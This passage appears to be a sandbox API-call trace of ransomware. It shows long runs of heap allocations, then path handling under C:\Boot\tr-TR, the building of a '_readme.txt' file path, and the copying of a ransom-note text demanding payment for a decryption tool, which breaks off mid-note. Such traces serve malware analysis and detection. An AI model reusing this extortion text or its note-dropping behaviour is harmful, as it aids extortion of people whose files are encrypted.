hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.663] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.663] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.664] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.664] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.665] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.665] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.666] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.666] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.667] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.667] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.668] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.668] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.673] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0227.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.673] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.673] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.673] PathFindFileNameW (pszPath="") returned="" [0227.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.673] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.673] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.674] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.674] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.674] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0227.674] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.674] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0227.676] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.676] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC 